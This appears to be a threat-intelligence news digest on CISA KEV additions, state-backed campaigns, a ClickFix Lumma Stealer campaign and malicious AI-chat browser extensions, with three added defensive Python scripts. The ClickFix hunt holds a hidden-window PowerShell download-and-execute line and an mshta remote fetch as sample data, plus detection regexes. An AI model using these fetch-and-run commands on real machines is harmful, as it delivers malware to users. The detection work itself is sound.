Originally reported by The Hacker News, Microsoft Security, SANS ISC, MSRC Security Updates
TL;DR
CISA confirmed active exploitation of critical vulnerabilities in Hikvision cameras and Rockwell automation systems. Meanwhile, Iranian MuddyWater hackers target US organizations with new Dindoor backdoor, and Chinese APT UAT-9244 deploys sophisticated implants against South American telecommunications infrastructure.
CISA added two critical CVSS 9.8 vulnerabilities to the KEV catalog with confirmed active exploitation, indicating immediate threat to organizations.
CISA added two critical-severity vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild. The flaws affect widely deployed industrial and surveillance systems:
CVE-2017-7921 (CVSS 9.8): Improper authentication vulnerability in Hikvision IP cameras
Under Binding Operational Directive 22-01, federal civilian agencies must remediate each KEV entry by the due date CISA assigns to it. A KEV addition means CISA has evidence of exploitation in the wild, so private-sector owners of these products should treat the same deadline as a floor, not a target.
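The practical check a defender wants after a KEV addition is "which of my assets carry a KEV-listed CVE, and when is it due?". The script below is an added example (not code from the article or from CISA) that cross-references a scanner-style asset inventory against a KEV catalog export. The real feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json) uses the field names shown here; the catalog excerpt, its dates, the second CVE ID and the inventory are all constructed for the demo.

```python
import json
from datetime import date

# Constructed KEV-style catalog excerpt (NOT the real feed). Field names follow the
# real JSON feed; the dates and the CVE-2099 entry are made up for this example.
KEV_SAMPLE = """
{
  "vulnerabilities": [
    {"cveID": "CVE-2017-7921", "vendorProject": "Hikvision", "product": "IP Cameras",
     "dateAdded": "2026-03-10", "dueDate": "2026-03-31",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2099-9999", "vendorProject": "ExampleCorp", "product": "Demo Gateway",
     "dateAdded": "2026-01-05", "dueDate": "2026-01-26",
     "knownRansomwareCampaignUse": "Known"}
  ]
}
"""

# Constructed asset inventory: CVE IDs per asset, as a vulnerability scanner would report them.
INVENTORY = [
    {"asset": "cam-lobby-01", "cves": ["CVE-2017-7921"]},
    {"asset": "plc-line-3", "cves": ["CVE-2099-9999", "CVE-2099-1111"]},
    {"asset": "web-01", "cves": ["CVE-2099-1111"]},
]


def load_kev(kev_json: str) -> dict:
    """Index the catalog by CVE ID so inventory lookups are O(1)."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def kev_exposure(kev_json: str, inventory: list, today_iso: str) -> list:
    """Return one finding per (asset, CVE) pair that appears in the KEV catalog,
    ordered by remediation due date, then by asset name."""
    kev = load_kev(kev_json)
    today = date.fromisoformat(today_iso)
    findings = []
    for item in inventory:
        for cve in item["cves"]:
            entry = kev.get(cve)
            if entry is None:          # not in KEV: still a vuln, but not this triage queue
                continue
            due = date.fromisoformat(entry["dueDate"])
            findings.append({
                "asset": item["asset"],
                "cve": cve,
                "product": f'{entry["vendorProject"]} {entry["product"]}',
                "due": entry["dueDate"],
                "days_left": (due - today).days,
                "overdue": due < today,
                "ransomware_use": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    findings.sort(key=lambda f: (f["due"], f["asset"]))
    return findings


if __name__ == "__main__":
    for f in kev_exposure(KEV_SAMPLE, INVENTORY, "2026-03-20"):
        flag = "OVERDUE" if f["overdue"] else f"{f['days_left']}d left"
        print(f'{f["asset"]:14} {f["cve"]:15} {f["product"]:24} due {f["due"]} ({flag})')
```

Run it daily against a fresh download of the feed; the `knownRansomwareCampaignUse` field is worth surfacing because it is the one signal in the catalog that separates "exploited somewhere" from "exploited by groups that will encrypt you".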
Broadcom's Symantec and Carbon Black Threat Hunter Team discovered Iranian state-sponsored group MuddyWater (Seedworm) establishing persistent footholds in multiple US organizational networks. The campaign targets banks, airports, non-profits, and the Israeli arm of a software company using a newly identified backdoor called Dindoor.
The intrusions demonstrate MuddyWater's continued focus on long-term persistence within critical infrastructure and financial sector networks.
Cisco Talos identified China-linked APT group UAT-9244 conducting sustained attacks against telecommunications infrastructure across South America since 2024. The group, closely associated with FamousSparrow, deployed three distinct implants:
The campaign specifically targets critical telecommunications infrastructure, indicating potential supply chain and communications interception objectives.
Microsoft disclosed a widespread ClickFix social engineering campaign observed in February 2026 that leverages Windows Terminal to deploy Lumma Stealer malware. The attack chain represents an evolution from previous ClickFix campaigns that relied on Windows Run dialog commands.
The technique exploits user trust in a legitimate, signed Windows application to execute malicious payloads, and shows attackers adapting to awareness training and detection rules built around the earlier Run dialog variant rather than around the PowerShell execution itself.
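Whichever host the lure uses, the observable that survives is the same: an interactive, user-driven parent (the Run dialog's parent explorer.exe, or WindowsTerminal.exe) spawning a script host with a paste-and-run command line that fetches and executes remote content. The hunt below is an added example, not from the article or from Microsoft, scoring constructed Sysmon-style process-creation events against that pattern. The parent/child process lists and the command-line indicators are assumptions drawn from public ClickFix reporting; the page does not specify the exact process chain of the Windows Terminal variant.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, fields trimmed).
# The command lines are made up for the demo and do not come from the article.
EVENTS = [
    {"parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0\WindowsTerminal.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"iex (iwr 'https://example.invalid/v.txt' -UseBasicParsing).Content\" # I am not a robot"},
    {"parent_image": r"C:\Windows\explorer.exe",           # Run dialog (Win+R) parent
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/captcha/verify.hta"},
    {"parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0\WindowsTerminal.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoLogo"},              # a normal terminal tab
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\build\\deploy.ps1"},
]

# Assumed user-driven entry points for pasted commands and the script hosts they launch.
INTERACTIVE_PARENTS = {"windowsterminal.exe", "explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Assumed command-line indicators; each is weak alone, so a minimum hit count is required.
INDICATORS = {
    "remote_fetch":    re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|mshta)\b", re.I),
    "in_memory_exec":  re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I),
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
    "captcha_lure":    re.compile(r"i am not a robot|captcha|verification id", re.I),
}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(event: dict, min_hits: int = 2) -> list:
    """Return the indicator names matched, or [] if the event is not an
    interactive-parent -> script-host launch or matches fewer than min_hits."""
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["command_line"])]
    return hits if len(hits) >= min_hits else []


def hunt(events: list, min_hits: int = 2) -> list:
    """(index, matched indicators) for every event that crosses the threshold."""
    return [(i, analyse(ev, min_hits)) for i, ev in enumerate(events) if analyse(ev, min_hits)]


if __name__ == "__main__":
    for i, hits in hunt(EVENTS):
        print(f"event {i}: {basename(EVENTS[i]['parent_image'])} -> {basename(EVENTS[i]['image'])}: {', '.join(hits)}")
```

Engineers pasting `iwr | iex` one-liners into a terminal will trip this, so tune `min_hits` or allow-list build hosts; the durable part of the rule is the parent/child shape plus the lure text, not any single flag.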
Microsoft Security identified malicious AI assistant browser extensions that collected chat histories from ChatGPT, DeepSeek, and other LLM platforms. The campaign achieved nearly 900,000 installs across more than 20,000 enterprise tenants.
The extensions specifically targeted:
This attack vector highlights emerging risks as organizations integrate AI tools into workflows without adequate browser extension security controls.
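The control that would have caught this class of extension before it reached 20,000 tenants is a manifest review: an "AI assistant" that injects a content script into chat pages and also holds a host permission for an unrelated third-party origin has both the read and the exfiltration half of the problem. The audit below is an added example (not code from the article or from Microsoft) that parses Manifest V3 files and flags that combination. The list of LLM chat origins, both manifests and the collector host are constructed; only ChatGPT and DeepSeek are named on the page.

```python
import json

# Assumed list of LLM chat origins to watch. ChatGPT and DeepSeek are named in the
# article; the rest stand in for "other LLM platforms".
LLM_HOSTS = ["chatgpt.com", "chat.openai.com", "chat.deepseek.com", "claude.ai", "gemini.google.com"]

# Constructed manifest.json files (not real extensions).
SUSPICIOUS_MANIFEST = json.loads("""
{
  "name": "AI Chat Helper (constructed)", "manifest_version": 3,
  "permissions": ["storage", "tabs"],
  "host_permissions": ["*://*.openai.com/*", "*://chatgpt.com/*", "*://chat.deepseek.com/*",
                       "https://collector.example.invalid/*"],
  "content_scripts": [{"matches": ["*://chatgpt.com/*", "*://chat.deepseek.com/*"], "js": ["inject.js"]}]
}
""")
BENIGN_MANIFEST = json.loads("""
{"name": "Tab Counter (constructed)", "manifest_version": 3, "permissions": ["activeTab"]}
""")


def host_pattern_covers(pattern: str, host: str) -> bool:
    """Does a Chrome match pattern (e.g. '*://*.openai.com/*') grant access to host?
    Handles <all_urls>, the '*' host wildcard and the '*.' subdomain prefix."""
    if pattern == "<all_urls>":
        return True
    if "://" not in pattern:
        return False
    host_part = pattern.split("://", 1)[1].split("/", 1)[0]
    if host_part == "*":
        return True
    if host_part.startswith("*."):
        base = host_part[2:]
        return host == base or host.endswith("." + base)
    return host == host_part


def audit_manifest(manifest: dict) -> dict:
    """Summarise which LLM chat origins an extension can read and where else it can talk."""
    host_perms = list(manifest.get("host_permissions", []))
    # MV2 manifests put match patterns in "permissions"; accept those too.
    host_perms += [p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"]
    script_matches = [m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]

    llm_reachable = sorted({h for h in LLM_HOSTS for p in host_perms + script_matches if host_pattern_covers(p, h)})
    llm_scripted = sorted({h for h in LLM_HOSTS for p in script_matches if host_pattern_covers(p, h)})
    # Any host permission that covers none of the chat origins is a candidate exfiltration channel.
    third_party = sorted(p for p in host_perms if not any(host_pattern_covers(p, h) for h in LLM_HOSTS))
    broad = any(p in ("<all_urls>", "*://*/*") for p in host_perms + script_matches)

    findings = []
    if llm_scripted:
        findings.append("content script injected into LLM chat pages: " + ", ".join(llm_scripted))
    if broad:
        findings.append("wildcard host access (<all_urls> or *://*/*)")
    if llm_scripted and third_party:
        findings.append("chat-page access combined with third-party hosts: " + ", ".join(third_party))
    return {"name": manifest.get("name"), "llm_hosts_reachable": llm_reachable,
            "llm_hosts_scripted": llm_scripted, "third_party_hosts": third_party, "findings": findings}


if __name__ == "__main__":
    for m in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        r = audit_manifest(m)
        print(r["name"], "->", r["findings"] or ["no findings"])
```

Feed it the manifests of every extension in your browser management export; an extension with chat-page content scripts but no third-party host is still worth a second look, since `fetch()` from a content script runs in the page origin and a background worker can use `<all_urls>` or a later update to add the channel.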
Microsoft published multiple CVE entries; several cover third-party open-source components rather than Microsoft's own products:
CVE-2026-23651: Microsoft ACI Confidential Containers privilege escalation via permissive regex in Azure Compute Gallery
CVE-2026-21536: Microsoft Devices Pricing Program remote code execution vulnerability
CVE-2026-23865: Integer overflow in FreeType library affecting OpenType variable fonts
CVE-2026-3338: PKCS7_verify signature validation bypass in AWS-LC
CVE-2026-24821: Heap buffer over-read in WickedEngine Lua compiler
CVE-2026-23235: Out-of-bounds access in f2fs sysfs attribute handling